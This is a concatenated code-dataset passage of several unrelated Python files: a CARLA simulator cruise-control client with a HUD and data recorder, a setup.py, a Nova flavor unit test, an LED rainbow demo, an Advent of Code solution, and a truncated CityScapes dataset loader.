==============================================================================\n# -- HUD -----------------------------------------------------------------\n# ==============================================================================\n\n\nclass HUD(object):\n def __init__(self, width, height):\n self.dim = (width, height)\n font = pygame.font.Font(pygame.font.get_default_font(), 20)\n fonts = [x for x in pygame.font.get_fonts() if 'mono' in x]\n default_font = 'ubuntumono'\n mono = default_font if default_font in fonts else fonts[0]\n mono = pygame.font.match_font(mono)\n self._font_mono = pygame.font.Font(mono, 14)\n self._notifications = FadingText(font, (width, 40), (0, height - 40))\n self.help = HelpText(pygame.font.Font(mono, 24), width, height)\n self.server_fps = 0\n self.frame_number = 0\n self.simulation_time = 0\n self._show_info = True\n self._info_text = []\n self._server_clock = pygame.time.Clock()\n\n def on_world_tick(self, timestamp):\n self._server_clock.tick()\n self.server_fps = self._server_clock.get_fps()\n self.frame_number = timestamp.frame_count\n self.simulation_time = timestamp.elapsed_seconds\n\n def tick(self, world, clock):\n if not self._show_info:\n return\n t = world.vehicle.get_transform()\n v = world.vehicle.get_velocity()\n c = world.vehicle.get_vehicle_control()\n heading = 'N' if abs(t.rotation.yaw) < 89.5 else ''\n heading += 'S' if abs(t.rotation.yaw) > 90.5 else ''\n heading += 'E' if 179.5 > t.rotation.yaw > 0.5 else ''\n heading += 'W' if -0.5 > t.rotation.yaw > -179.5 else ''\n colhist = world.collision_sensor.get_collision_history()\n collision = [colhist[x + self.frame_number - 200] for x in range(0, 200)]\n max_col = max(1.0, max(collision))\n collision = [x / max_col for x in collision]\n vehicles = world.world.get_actors().filter('vehicle.*')\n self._info_text = [\n 'Server: % 16d FPS' % self.server_fps,\n '',\n 'Vehicle: % 20s' % get_actor_display_name(world.vehicle, truncate=20),\n 'Map: % 20s' % world.world.map_name,\n 'Simulation time: % 12s' % datetime.timedelta(seconds=int(self.simulation_time)),\n '',\n 'Speed: % 15.0f km/h' % (3.6 * math.sqrt(v.x**2 + v.y**2 + v.z**2)),\n u'Heading:% 16.0f\\N{DEGREE SIGN} % 2s' % (t.rotation.yaw, heading),\n 'Location:% 20s' % ('(% 5.1f, % 5.1f)' % (t.location.x, t.location.y)),\n 'Height: % 18.0f m' % t.location.z,\n 'Traffic_lights: % 16d FPS' % self.server_fps,\n '', \n '',\n ('Throttle:', c.throttle, 0.0, 1.0),\n ('Steer:', c.steer, -1.0, 1.0),\n ('Brake:', c.brake, 0.0, 1.0),\n ('Reverse:', c.reverse),\n ('Hand brake:', c.hand_brake),\n ('Manual:', c.manual_gear_shift),\n 'Gear: %s' % {-1: 'R', 0: 'N'}.get(c.gear, c.gear),\n '',\n 'Collision:',\n collision,\n '',\n 'Number of vehicles: % 8d' % len(vehicles)\n ]\n if len(vehicles) > 1:\n self._info_text += ['Nearby vehicles:']\n distance = lambda l: math.sqrt((l.x - t.location.x)**2 + (l.y - t.location.y)**2 + (l.z - t.location.z)**2)\n vehicles = [(distance(x.get_location()), x) for x in vehicles if x.id != world.vehicle.id]\n for d, vehicle in sorted(vehicles):\n if d > 200.0:\n break\n vehicle_type = get_actor_display_name(vehicle, truncate=22)\n self._info_text.append('% 4dm %s' % (d, vehicle_type))\n self._notifications.tick(world, clock)\n\n def toggle_info(self):\n self._show_info = not self._show_info\n\n def notification(self, text, seconds=2.0):\n self._notifications.set_text(text, seconds=seconds)\n\n def error(self, text):\n self._notifications.set_text('Error: %s' % text, (255, 0, 0))\n\n def render(self, display):\n if self._show_info:\n info_surface = pygame.Surface((220, self.dim[1]))\n info_surface.set_alpha(100)\n display.blit(info_surface, (0, 0))\n v_offset = 4\n bar_h_offset = 100\n bar_width = 106\n for item in self._info_text:\n if v_offset + 18 > self.dim[1]:\n break\n if isinstance(item, list):\n if len(item) > 1:\n points = [(x + 8, v_offset + 8 + (1.0 - y) * 30) for x, y in enumerate(item)]\n pygame.draw.lines(display, (255, 136, 0), False, points, 2)\n item = None\n v_offset += 18\n elif isinstance(item, tuple):\n if isinstance(item[1], bool):\n rect = pygame.Rect((bar_h_offset, v_offset + 8), (6, 6))\n pygame.draw.rect(display, (255, 255, 255), rect, 0 if item[1] else 1)\n else:\n rect_border = pygame.Rect((bar_h_offset, v_offset + 8), (bar_width, 6))\n pygame.draw.rect(display, (255, 255, 255), rect_border, 1)\n f = (item[1] - item[2]) / (item[3] - item[2])\n if item[2] < 0.0:\n rect = pygame.Rect((bar_h_offset + f * (bar_width - 6), v_offset + 8), (6, 6))\n else:\n rect = pygame.Rect((bar_h_offset, v_offset + 8), (f * bar_width, 6))\n pygame.draw.rect(display, (255, 255, 255), rect)\n item = item[0]\n if item: # At this point has to be a str.\n surface = self._font_mono.render(item, True, (255, 255, 255))\n display.blit(surface, (8, v_offset))\n v_offset += 18\n self._notifications.render(display)\n self.help.render(display)\n\n\n# ==============================================================================\n# -- FadingText ----------------------------------------------------------------\n# ==============================================================================\n\nclass FadingText(object):\n def __init__(self, font, dim, pos):\n self.font = font\n self.dim = dim\n self.pos = pos\n self.seconds_left = 0\n self.surface = pygame.Surface(self.dim)\n\n def set_text(self, text, color=(255, 255, 255), seconds=2.0):\n text_texture = self.font.render(text, True, color)\n self.surface = pygame.Surface(self.dim)\n self.seconds_left = seconds\n self.surface.fill((0, 0, 0, 0))\n self.surface.blit(text_texture, (10, 11))\n\n def tick(self, _, clock):\n delta_seconds = 1e-3 * clock.get_time()\n self.seconds_left = max(0.0, self.seconds_left - delta_seconds)\n self.surface.set_alpha(500.0 * self.seconds_left)\n\n def render(self, display):\n display.blit(self.surface, self.pos)\n\n# ==============================================================================\n# -- HelpText ------------------------------------------------------------------\n# ==============================================================================\n\n\nclass HelpText(object):\n def __init__(self, font, width, height):\n lines = __doc__.split('\\n')\n self.font = font\n self.dim = (680, len(lines) * 22 + 12)\n self.pos = (0.5 * width - 0.5 * self.dim[0], 0.5 * height - 0.5 * self.dim[1])\n self.seconds_left = 0\n self.surface = pygame.Surface(self.dim)\n self.surface.fill((0, 0, 0, 0))\n for n, line in enumerate(lines):\n text_texture = self.font.render(line, True, (255, 255, 255))\n self.surface.blit(text_texture, (22, n * 22))\n self._render = False\n self.surface.set_alpha(220)\n\n def toggle(self):\n self._render = not self._render\n\n def render(self, display):\n if self._render:\n display.blit(self.surface, self.pos)\n\n# ==============================================================================\n# -- CollisionSensor -----------------------------------------------------------\n# ==============================================================================\n\n\nclass CollisionSensor(object):\n def __init__(self, parent_actor, hud):\n self.sensor = None\n self._history = []\n self._parent = parent_actor\n self._hud = hud\n world = self._parent.get_world()\n bp = world.get_blueprint_library().find('sensor.other.collision')\n self.sensor = world.spawn_actor(bp, carla.Transform(), attach_to=self._parent)\n # We need to pass the lambda a weak reference to self to avoid circular\n # reference.\n weak_self = weakref.ref(self)\n self.sensor.listen(lambda event: CollisionSensor._on_collision(weak_self, event))\n\n def get_collision_history(self):\n history = collections.defaultdict(int)\n for frame, intensity in self._history:\n history[frame] += intensity\n return history\n\n @staticmethod\n def _on_collision(weak_self, event):\n self = weak_self()\n if not self:\n return\n actor_type = get_actor_display_name(event.other_actor)\n self._hud.notification('Collision with %r, id = %d' % (actor_type, event.other_actor.id))\n impulse = event.normal_impulse\n intensity = math.sqrt(impulse.x ** 2 + impulse.y ** 2 + impulse.z ** 2)\n self._history.append((event.frame_number, intensity))\n if len(self._history) > 4000:\n self._history.pop(0)\n\n\n# ==============================================================================\n# -- LaneInvasionSensor --------------------------------------------------------\n# ==============================================================================\n\nclass LaneInvasionSensor(object):\n def __init__(self, parent_actor, hud):\n self.sensor = None\n self._parent = parent_actor\n self._hud = hud\n world = self._parent.get_world()\n bp = world.get_blueprint_library().find('sensor.other.lane_detector')\n self.sensor = world.spawn_actor(bp, carla.Transform(), attach_to=self._parent)\n # We need to pass the lambda a weak reference to self to avoid circular\n # reference.\n weak_self = weakref.ref(self)\n self.sensor.listen(lambda event: LaneInvasionSensor._on_invasion(weak_self, event))\n\n @staticmethod\n def _on_invasion(weak_self, event):\n self = weak_self()\n if not self:\n return\n text = ['%r' % str(x).split()[-1] for x in set(event.crossed_lane_markings)]\n self._hud.notification('Crossed line %s' % ' and '.join(text))\n\n\n# ==============================================================================\n# -- CameraManager -------------------------------------------------------------\n# ==============================================================================\n\nclass CameraManager(object):\n def __init__(self, parent_actor, hud):\n self.sensor = None\n self._surface = None\n self._parent = parent_actor\n self._hud = hud\n self._recording = False\n self._camera_transforms = [\n carla.Transform(carla.Location(x=-5.5, z=2.8), carla.Rotation(pitch=-15)),\n carla.Transform(carla.Location(x=1.6, z=1.7))]\n self._transform_index = 1\n self._sensors = [\n ['sensor.camera.rgb', cc.Raw, 'Camera RGB'],\n ['sensor.camera.depth', cc.Raw, 'Camera Depth (Raw)'],\n ['sensor.camera.depth', cc.Depth, 'Camera Depth (Gray Scale)'],\n ['sensor.camera.depth', cc.LogarithmicDepth, 'Camera Depth (Logarithmic Gray Scale)'],\n ['sensor.camera.semantic_segmentation', cc.Raw, 'Camera Semantic Segmentation (Raw)'],\n ['sensor.camera.semantic_segmentation', cc.CityScapesPalette,\n 'Camera Semantic Segmentation (CityScapes Palette)'],\n ['sensor.lidar.ray_cast', None, 'Lidar (Ray-Cast)']]\n world = self._parent.get_world()\n bp_library = world.get_blueprint_library()\n for item in self._sensors:\n bp = bp_library.find(item[0])\n if item[0].startswith('sensor.camera'):\n bp.set_attribute('image_size_x', str(hud.dim[0]))\n bp.set_attribute('image_size_y', str(hud.dim[1]))\n item.append(bp)\n self._index = None\n\n def toggle_camera(self):\n self._transform_index = (self._transform_index + 1) % len(self._camera_transforms)\n self.sensor.set_transform(self._camera_transforms[self._transform_index])\n\n def set_sensor(self, index, notify=True):\n index = index % len(self._sensors)\n needs_respawn = True if self._index is None \\\n else self._sensors[index][0] != self._sensors[self._index][0]\n if needs_respawn:\n if self.sensor is not None:\n self.sensor.destroy()\n self._surface = None\n self.sensor = self._parent.get_world().spawn_actor(\n self._sensors[index][-1],\n self._camera_transforms[self._transform_index],\n attach_to=self._parent)\n # We need to pass the lambda a weak reference to self to avoid\n # circular reference.\n weak_self = weakref.ref(self)\n self.sensor.listen(lambda image: CameraManager._parse_image(weak_self, image))\n if notify:\n self._hud.notification(self._sensors[index][2])\n self._index = index\n\n def next_sensor(self):\n self.set_sensor(self._index + 1)\n\n def toggle_recording(self):\n self._recording = not self._recording\n self._hud.notification('Recording %s' % ('On' if self._recording else 'Off'))\n\n def render(self, display):\n if self._surface is not None:\n display.blit(self._surface, (0, 0))\n\n @staticmethod\n def _parse_image(weak_self, image):\n self = weak_self()\n if not self:\n return\n if self._sensors[self._index][0].startswith('sensor.lidar'):\n points = np.frombuffer(image.raw_data, dtype=np.dtype('f4'))\n points = np.reshape(points, (int(points.shape[0] / 3), 3))\n lidar_data = np.array(points[:, :2])\n lidar_data *= min(self._hud.dim) / 100.0\n lidar_data += (0.5 * self._hud.dim[0], 0.5 * self._hud.dim[1])\n lidar_data = np.fabs(lidar_data)\n lidar_data = lidar_data.astype(np.int32)\n lidar_data = np.reshape(lidar_data, (-1, 2))\n lidar_img_size = (self._hud.dim[0], self._hud.dim[1], 3)\n lidar_img = np.zeros(lidar_img_size)\n lidar_img[tuple(lidar_data.T)] = (255, 255, 255)\n self._surface = pygame.surfarray.make_surface(lidar_img)\n else:\n image.convert(self._sensors[self._index][1])\n array = np.frombuffer(image.raw_data, dtype=np.dtype(\"uint8\"))\n array = np.reshape(array, (image.height, image.width, 4))\n array = array[:, :, :3]\n array = array[:, :, ::-1]\n self._surface = pygame.surfarray.make_surface(array.swapaxes(0, 1))\n if self._recording:\n image.save_to_disk('_out/%08d' % image.frame_number)\n\n\n# ==============================================================================\n# -- Recorder() ---------------------------------------------------------\n# ==============================================================================\nclass Recorder(object):\n def __init__(self,vehicle,support_vehicle,controller,workbook):\n self.vehicle = vehicle\n self.support_vehicle = support_vehicle\n self.world = vehicle.get_world()\n self.workbook = workbook\n self.counter = 1\n self.sheetname = str(get_actor_display_name(vehicle, truncate=20))\n self.sheet = workbook.add_sheet(self.sheetname)\n self.vehicle_list = self.world.get_actors().filter(\"vehicle*\")\n self.controller = controller\n self.workbookname = str(time.strftime('%Y.%m.%d_%H%M%S',time.localtime(time.time()))) \\\n + '_ID_' + str(vehicle.id) + '.xls'\n self.sheet.write(0,0,\"Ego_Speed\")\n self.sheet.write(0,1,\"Supporting_Speed\") \n self.sheet.write(0,2,\"Target_Speed\")\n self.sheet.write(0,3,\"Ego_Acceleration\")\n self.sheet.write(0,4,\"Supporting_Acceleration\")\n self.sheet.write(0,5,\"Ego_Location_y\")\n self.sheet.write(0,6,\"Support_Location_y\")\n self.sheet.write(0,7,\"Support_Yaw_Angle\")\n self.sheet.write(0,8,\"Ego_Yaw_Angle\")\n self.sheet.write(0,9,\"Throttle\")\n self.sheet.write(0,10,\"Steer\")\n self.sheet.write(0,11,\"Brake\")\n self.sheet.write(0,12,\"Relative_distance\")\n\n \n def start_recorder(self):\n wb = self.workbook\n vehicle = self.vehicle\n row = self.counter\n worksheet = self.sheet\n supporting_actor = self.support_vehicle\n controller = self.controller\n\n control = vehicle.get_vehicle_control()\n ego_velocity = vehicle.get_velocity() \n support_velocity = supporting_actor.get_velocity()\n target_speed = controller\n ego_acceleration_vector = vehicle.get_acceleration()\n sup_acceleration_vector = supporting_actor.get_acceleration()\n\n s_loc = supporting_actor.get_location()\n s_loc_x = s_loc.x\n s_loc_y = s_loc.y\n s_loc_z = s_loc.z\n \n support_speed = 3.6 * math.sqrt(support_velocity.x**2 + support_velocity.y**2 + support_velocity.z**2)\n ego_speed = 3.6 * math.sqrt(ego_velocity.x**2 + ego_velocity.y**2 + ego_velocity.z**2)\n target_speed = controller._lon_controller.speed_setting()\n\n ego_acceleration = math.sqrt(ego_acceleration_vector.x**2 + ego_acceleration_vector.y**2 + ego_acceleration_vector.z**2)\n sup_acceleration = math.sqrt(sup_acceleration_vector.x**2 + sup_acceleration_vector.y**2 + sup_acceleration_vector.z**2)\n # sup_acceleration = 10\n ego_location_x = vehicle.get_location().x\n ego_location_y = vehicle.get_location().y\n ego_location_z = vehicle.get_location().z\n \n ego_yaw = vehicle.get_transform().rotation.yaw\n support_yaw = supporting_actor.get_transform().rotation.yaw\n\n throttle = control.throttle\n steer = control.steer\n brake = control.brake\n\n distance = math.sqrt((s_loc_x - ego_location_x)**2 + (s_loc_y - ego_location_y)**2 + (s_loc_z - ego_location_z)**2)\n\n worksheet.write(row,0,ego_speed)\n worksheet.write(row,1,support_speed) \n worksheet.write(row,2,target_speed)\n worksheet.write(row,3,ego_acceleration)\n worksheet.write(row,4,sup_acceleration)\n worksheet.write(row,5,ego_location_y)\n worksheet.write(row,6,s_loc_y)\n worksheet.write(row,7,support_yaw)\n worksheet.write(row,8,ego_yaw)\n worksheet.write(row,9,throttle)\n worksheet.write(row,10,steer)\n worksheet.write(row,11,brake)\n worksheet.write(row,12,distance)\n\n self.counter += 1\n wb.save(self.workbookname)\n\n def finish_recorder(self):\n wb = self.workbook\n wb.save()\n\n# ==============================================================================\n# -- game_loop() ---------------------------------------------------------\n# ==============================================================================\n\ndef game_loop(args):\n pygame.init()\n pygame.font.init()\n world = None\n supporting_actor_list = []\n try:\n client = carla.Client(args.host, args.port)\n client.set_timeout(4.0)\n\n display = pygame.display.set_mode(\n (args.width, args.height),\n pygame.HWSURFACE | pygame.DOUBLEBUF)\n\n hud = HUD(args.width, args.height)\n world = World(client.get_world(), hud)\n blueprint = world.world.get_blueprint_library()\n transform_1 = carla.Transform (carla.Location(x=-2.10, y=-145.30, z=0.4),carla.Rotation(pitch=0, yaw=90.0, roll=0))\n carModel_1 = random.choice (blueprint.filter('vehicle.tesla.*')) \n carModel_1.set_attribute('color','10,10,10')\n carActor_1 = world.world.try_spawn_actor(carModel_1,transform_1)\n carActor_1.set_autopilot (True) \n supporting_actor_list.append(carActor_1) \n front_vehicle = carActor_1\n\n controller = KeyboardControl(world, False)\n PID_contoller = VehiclePIDController (world.vehicle)\n hero = world.vehicle\n \n # if args.agent == \"Roaming\":\n # agent = RoamingAgent(world.vehicle)\n # else:\n # agent = BasicAgent(world.vehicle)\n # spawn_point = world.world.get_map().get_spawn_points()[0]\n # agent.set_destination((spawn_point.location.x,\n # spawn_point.location.y,\n # spawn_point.location.z))\n\n clock = pygame.time.Clock()\n \n # this vehicle list only has 1 member\n vehicle_list_1 = world.world.get_actors().filter(\"*vehicle*\")\n # this vehicle list has 2 members\n vehicle_list_2 = PID_contoller._world.get_actors().filter(\"*vehicle*\")\n \n # if len(vehicle_list) > 1:\n # for index in vehicle_list:\n # if index.id != world.vehicle.id:\n # front_vehicle = index\n # else:\n # pass \n # else:\n # front_vehicle = hero\n \n # way_point = world.world.get_map().get_waypoint(front_vehicle.get_location())\n # target_transform = carla.Transform (carla.Location(x=-500, y=-7.7, z=0.4),carla.Rotation(pitch=0, yaw=-179.000000, roll=0))\n way_point = world.world.get_map().get_waypoint(carla.Location(x=-2.1, y=180, z=0))\n # spawn_point = world.world.get_map().get_spawn_points()[0]\n # way_point = world.world.get_map().get_waypoint(spawn_point.location)\n wb = xlwt.Workbook()\n ego_recorder = Recorder(hero,front_vehicle,PID_contoller,wb)\n while True:\n # print (way_point)\n if controller.parse_events(world, clock):\n return\n\n # as soon as the server is ready continue!\n if not world.world.wait_for_tick(10.0):\n continue\n # print (front_vehicle.get_location())\n world.tick(clock)\n world.render(display)\n pygame.display.flip()\n control = PID_contoller.run_step()\n world.vehicle.apply_control(control)\n ego_recorder.start_recorder()\n # print (counter)\n \n # sheet1.write(counter,0,'haha')\n # counter = counter + 1 \n # wb.save('xlwt example_4.xlsx')\n\n finally:\n \n if world is not None:\n world.destroy()\n\n print('\\ndestroying %d actors' % len(supporting_actor_list))\n for actor in supporting_actor_list:\n actor.destroy() \n\n pygame.quit()\n\n\n# ==============================================================================\n# -- main() --------------------------------------------------------------\n# ==============================================================================\n\n\ndef main():\n argparser = argparse.ArgumentParser(\n description='CARLA Manual Control Client')\n argparser.add_argument(\n '-v', '--verbose',\n action='store_true',\n dest='debug',\n help='print debug information')\n argparser.add_argument(\n '--host',\n metavar='H',\n default='127.0.0.1',\n help='IP of the host server (default: 127.0.0.1)')\n argparser.add_argument(\n '-p', '--port',\n metavar='P',\n default=2000,\n type=int,\n help='TCP port to listen to (default: 2000)')\n argparser.add_argument(\n '--res',\n metavar='WIDTHxHEIGHT',\n default='1280x720',\n help='window resolution (default: 1280x720)')\n\n argparser.add_argument(\"-a\", \"--agent\", type=str,\n choices=[\"Roaming\", \"Basic\"],\n help=\"select which agent to run\",\n default=\"Basic\")\n args = argparser.parse_args()\n\n args.width, args.height = [int(x) for x in args.res.split('x')]\n\n log_level = logging.DEBUG if args.debug else logging.INFO\n logging.basicConfig(format='%(levelname)s: %(message)s', level=log_level)\n\n logging.info('listening to server %s:%s', args.host, args.port)\n\n print(__doc__)\n actor_list = []\n\n try:\n game_loop(args)\n except KeyboardInterrupt:\n print('\\nCancelled by user. Bye!')\n except Exception as error:\n logging.exception(error)\n \n finally:\n print('\\ndestroying %d actors' % len(actor_list))\n for actor in actor_list:\n actor.destroy()\n\n\nif __name__ == '__main__':\n\n main()\n","repo_name":"HanzhiC/CARLA-Intelligent-Cruise-System","sub_path":"History_Version/PID_Stop-Go_ACC_04011558.py","file_name":"PID_Stop-Go_ACC_04011558.py","file_ext":"py","file_size_in_byte":47879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40963348058","text":"#!/usr/bin/env python\n# flake8: noqa\nimport os\n\nfrom setuptools import setup, find_packages\nfrom pkg_resources import parse_requirements\n\nreq_file = os.path.join(os.path.dirname(__file__), \"requirements.txt\")\n\nwith open(req_file, 'r') as inst_reqs:\n install_requires = [str(req) for req in parse_requirements(inst_reqs)]\n\npackages = find_packages(include=['convert_app', 'convert_app.*'])\n\nsetup(\n name='convert_app',\n version='1.0.0',\n author='Alessio Izzo',\n author_email='alessio.izzo86@gmail.com',\n description='An online currency converter',\n long_description=__doc__,\n packages=packages,\n install_requires=install_requires,\n include_package_data=True,\n classifiers=[\n 'Development Status :: 1 - Beta',\n 'Programming Language :: Python',\n 'Environment :: Web Environment',\n 'Operating System :: OS Independent',\n 'Intended Audience :: Developers',\n 'Topic :: System :: Software Distribution',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: Implementation :: PyPy',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n ]\n)\n","repo_name":"aless10/CurrencyConverter","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28564166977","text":"from nova.compute import arch\nfrom nova import context\nfrom nova import objects\nfrom nova import test\n\n\nclass InstanceTypeExtraSpecsTestCase(test.TestCase):\n\n def setUp(self):\n super(InstanceTypeExtraSpecsTestCase, self).setUp()\n self.context = context.get_admin_context()\n flavor = objects.Flavor(context=self.context,\n name=\"cg1.4xlarge\",\n memory_mb=22000,\n vcpus=8,\n root_gb=1690,\n ephemeral_gb=2000,\n flavorid=105)\n self.specs = dict(cpu_arch=arch.X86_64,\n cpu_model=\"Nehalem\",\n xpu_arch=\"fermi\",\n xpus=\"2\",\n xpu_model=\"Tesla 2050\")\n flavor.extra_specs = self.specs\n flavor.create()\n self.flavor = flavor\n self.instance_type_id = flavor.id\n self.flavorid = flavor.flavorid\n\n def tearDown(self):\n # Remove the instance type from the database\n self.flavor.destroy()\n super(InstanceTypeExtraSpecsTestCase, self).tearDown()\n\n def test_instance_type_specs_get(self):\n flavor = objects.Flavor.get_by_flavor_id(self.context,\n self.flavorid)\n self.assertEqual(self.specs, flavor.extra_specs)\n\n def test_flavor_extra_specs_delete(self):\n del self.specs[\"xpu_model\"]\n del self.flavor.extra_specs['xpu_model']\n self.flavor.save()\n flavor = objects.Flavor.get_by_flavor_id(self.context,\n self.flavorid)\n self.assertEqual(self.specs, flavor.extra_specs)\n\n def test_instance_type_extra_specs_update(self):\n self.specs[\"cpu_model\"] = \"Sandy Bridge\"\n self.flavor.extra_specs[\"cpu_model\"] = \"Sandy Bridge\"\n self.flavor.save()\n flavor = objects.Flavor.get_by_flavor_id(self.context,\n self.flavorid)\n self.assertEqual(self.specs, flavor.extra_specs)\n\n def test_instance_type_extra_specs_create(self):\n net_attrs = {\n \"net_arch\": \"ethernet\",\n \"net_mbps\": \"10000\"\n }\n self.specs.update(net_attrs)\n self.flavor.extra_specs.update(net_attrs)\n self.flavor.save()\n flavor = objects.Flavor.get_by_flavor_id(self.context,\n self.flavorid)\n self.assertEqual(self.specs, flavor.extra_specs)\n\n def test_instance_type_get_with_extra_specs(self):\n flavor = objects.Flavor.get_by_id(self.context, 5)\n self.assertEqual(flavor.extra_specs, {})\n\n def test_instance_type_get_by_name_with_extra_specs(self):\n flavor = objects.Flavor.get_by_name(self.context,\n \"cg1.4xlarge\")\n self.assertEqual(flavor.extra_specs, self.specs)\n flavor = objects.Flavor.get_by_name(self.context,\n \"m1.small\")\n self.assertEqual(flavor.extra_specs, {})\n\n def test_instance_type_get_by_flavor_id_with_extra_specs(self):\n flavor = objects.Flavor.get_by_flavor_id(self.context, 105)\n self.assertEqual(flavor.extra_specs, self.specs)\n flavor = objects.Flavor.get_by_flavor_id(self.context, 2)\n self.assertEqual(flavor.extra_specs, {})\n\n def test_instance_type_get_all(self):\n flavors = objects.FlavorList.get_all(self.context)\n\n name2specs = {flavor.name: flavor.extra_specs\n for flavor in flavors}\n\n self.assertEqual(name2specs['cg1.4xlarge'], self.specs)\n self.assertEqual(name2specs['m1.small'], {})\n","repo_name":"BU-NU-CLOUD-SP16/Trusted-Platform-Module-nova","sub_path":"nova/tests/unit/test_instance_types_extra_specs.py","file_name":"test_instance_types_extra_specs.py","file_ext":"py","file_size_in_byte":3794,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"21462612700","text":"# Simple demo of of the WS2801/SPI-like addressable RGB LED lights.\nimport time\nimport RPi.GPIO as GPIO\n \n# Import the WS2801 module.\nimport Adafruit_WS2801\nimport Adafruit_GPIO.SPI as SPI\n \n \n# Configure the count of pixels:\nPIXEL_COUNT = 191\n \n# Alternatively specify a hardware SPI connection on /dev/spidev0.0:\nSPI_PORT = 0\nSPI_DEVICE = 0\npixels = Adafruit_WS2801.WS2801Pixels(PIXEL_COUNT, spi=SPI.SpiDev(SPI_PORT, SPI_DEVICE), gpio=GPIO)\n \n \n# Define the wheel function to interpolate between different hues.\ndef wheel(pos):\n if pos < 85:\n return Adafruit_WS2801.RGB_to_color(pos * 3, 255 - pos * 3, 0)\n elif pos < 170:\n pos -= 85\n return Adafruit_WS2801.RGB_to_color(255 - pos * 3, 0, pos * 3)\n else:\n pos -= 170\n return Adafruit_WS2801.RGB_to_color(0, pos * 3, 255 - pos * 3)\n \n \ndef rainbow_cycle(pixels, wait=0.005):\n for j in range(256): # one cycle of all 256 colors in the wheel\n for i in range(pixels.count()):\n pixels.set_pixel(i, wheel(((i * 256 // pixels.count()) + j) % 256) )\n pixels.show()\n if wait > 0:\n time.sleep(wait)\n \n \n \n \nif __name__ == \"__main__\":\n # Clear all the pixels to turn them off.\n pixels.clear()\n pixels.show() # Make sure to call show() after changing any pixels!\n\n while True: \n rainbow_cycle(pixels, wait=0.001)\n \n \n \n \n \n \n","repo_name":"aws-samples/aws-builders-fair-projects","sub_path":"reinvent-2019/rhythm-cloud/pi/idleMode.py","file_name":"idleMode.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"48"} +{"seq_id":"10508268275","text":"from collections import Counter\n\nwith open(\"day10.input\") as f:\n data = map(int, f.readlines())\n\n# data = [int(l) for l in \"\"\"16\n# 10\n# 15\n# 5\n# 1\n# 11\n# 7\n# 19\n# 6\n# 12\n# 4\"\"\".split(\"\\n\")]\n\n# data = [int(l) for l in \"\"\"28\n# 33\n# 18\n# 42\n# 31\n# 14\n# 46\n# 20\n# 48\n# 47\n# 24\n# 23\n# 49\n# 45\n# 19\n# 38\n# 39\n# 11\n# 1\n# 32\n# 25\n# 35\n# 8\n# 17\n# 7\n# 9\n# 4\n# 2\n# 34\n# 10\n# 3\"\"\".split(\"\\n\")]\n\nseq = sorted(data)\n\n# Part 1\ncounter = Counter(b - a for a, b in zip([0] + seq, seq))\nprint(counter[1] * (counter[3] + 1))\n\n# Part 2\ncounter = Counter({0: 1})\nfor x in seq:\n counter[x] = sum(counter[i] for i in range(x - 3, x))\nprint(counter[seq[-1]])\n","repo_name":"Jemgoss/adventofcode","sub_path":"2020/day10.py","file_name":"day10.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37218776604","text":"#%%\n# from haven import utils as mlkit_ut\n\nfrom PIL import Image\nimport numpy as np\nimport torch\nfrom scipy.ndimage.morphology import distance_transform_edt\nimport os\nfrom haven import haven_utils as hu\nfrom haven import haven_img as hi\nfrom skimage.io import imread\nfrom scipy.io import loadmat\nimport torchvision.transforms.functional as FT\nimport numpy as np\nimport torch\nfrom skimage.io import imread\nimport torchvision.transforms.functional as FT\nfrom skimage.transform import rescale\nimport torchvision\nfrom torchvision import datasets\nfrom torchvision.transforms import transforms\nimport pylab as plt\nfrom skimage.color import label2rgb\n# from repos.selectivesearch.selectivesearch import selective_search\n\n\nclass CityScapes:\n def __init__(self, split, exp_dict):\n\n path = '/mnt/public/datasets/cityscapes'\n self.split = split\n self.exp_dict = exp_dict\n self.n_classes = 19\n\n if split == \"train\":\n resize = True\n flip = False\n \n \n self.transforms = lambda image, targets:joint_transform(image, \n targets, resize=resize, flip=flip)\n else:\n resize = True\n split = 'val'\n self.transforms = lambda image, targets:joint_transform_val(image, \n targets, resize=resize)\n \n # self.effort_per_image = 90*60\n self.dataset = CityScapesTrainIds(path, \n split=split, \n mode='fine',\n # transforms=transforms,\n target_type=['semantic','instance'])\n\n self.transform = joint_transform\n\n def __len__(self):\n return len(self.dataset)\n\n def __getitem__(self, index):\n images, targets_instance = self.dataset[index]\n targets, mask_inst = targets_instance\n images, targets, flipped = self.transforms(images, targets)\n\n mask_inst = transforms.Resize(size=512, interpolation=Image.NEAREST)(mask_inst)\n mask_inst = torch.from_numpy(np.array(mask_inst))\n mask_inst = mask_inst.long()\n inst = torch.zeros(targets.shape).long()\n classes = np.unique(targets)\n\n category_id2label_id = {28:1, 26:2, 27:3, 24:4, 25:5,\n 32:6, 31:7, 33:8}\n\n uniques = np.unique(mask_inst)\n point_list = []\n selected = set()\n inst_id = 0\n for category_id in category_id2label_id.keys():\n instances = uniques[(uniques>=category_id*1000) & (uniques<(category_id+1)*1000)]\n if len(instances) == 0:\n continue\n\n # ind = ((mask_inst>=category_id*1000) & \n # (mask_inst<(category_id+1)*1000))\n # class_id = category_id2label_id[category_id]\n for i, u in enumerate(instances):\n seg_ind = mask_inst==u\n inst[seg_ind] = inst_id\n inst_id += 1\n dist = distance_transform_edt(seg_ind)\n yx = np.unravel_index(dist.argmax(), dist.shape)\n class_id = int(targets[yx])\n if class_id == 255:\n continue\n\n if class_id >= self.n_classes:\n raise ValueError('not found')\n \n selected.add(class_id)\n point_list += [{'y':yx[0], 'x':yx[1], 'cls':class_id}]\n \n for l in np.setdiff1d(classes, list(selected) + [255]):\n y_list, x_list = np.where(targets == l)\n yc, xc = get_median(y_list, x_list)\n class_id = int(targets[yc, xc])\n if class_id == 255:\n continue\n \n if class_id >= self.n_classes:\n raise ValueError('not found')\n\n point_list += [{'y':yc, 'x':xc, 'cls':class_id}]\n\n # if 1:\n # 